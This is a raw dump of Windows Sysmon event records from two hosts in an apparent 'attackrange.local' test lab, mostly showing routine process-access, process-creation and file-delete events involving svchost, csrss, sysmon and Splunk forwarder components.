16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245819Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51E2-6063-B322-00000000AF01}476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245818Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51E2-6063-B322-00000000AF01}476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245817Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.179{CB4067E1-51E2-6063-B322-00000000AF01}476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245816Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD16660F24AC4F964454BD64BB4CFFF8,SHA256=51B87219807FC1F62D086A61989BD61A4D956C32DF5B7D8688555170C1CED61A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245815Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FF5FDEB3EFE5D3D07245B63FF825812,SHA256=23340184FE23F9610731CAC6DA9738DFFA0F46F4491C65602B08564B7553BCCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061112Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.981{7F8C56E7-51E3-6063-2301-00000000AF01}59765704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061111Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=667BA69A32D1BF61B19674935A736238,SHA256=89A7F6617BC5DB903167033DB672D952FAAC665CE33B6CD7F426DBB125BC3A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061110Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E7189DCF3F9CD8342CEE777F0ED136F,SHA256=F9E47ABFB41A2A0F1E1896003F793258EE3EEDB63A869BD79FEAC9075B00F466,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061109Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51E3-6063-2301-00000000AF01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061108Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061107Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061106Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061105Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061104Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-51E3-6063-2301-00000000AF01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061103Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.856{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51E3-6063-2301-00000000AF01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061102Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.857{7F8C56E7-51E3-6063-2301-00000000AF01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061101Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:23.169{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F4522E30245E008663840621DB5221C,SHA256=BFDE51903D4034EAEF1804049D655D34B12E4E30B6F77D3FD4855B41E9A8A59E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245860Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.568{CB4067E1-51E3-6063-B522-00000000AF01}3320972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245859Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51E3-6063-B522-00000000AF01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245858Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245857Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245856Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245855Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245854Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245853Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245852Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245851Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245850Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245849Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51E3-6063-B522-00000000AF01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245848Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.458{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51E3-6063-B522-00000000AF01}3320C:\Program 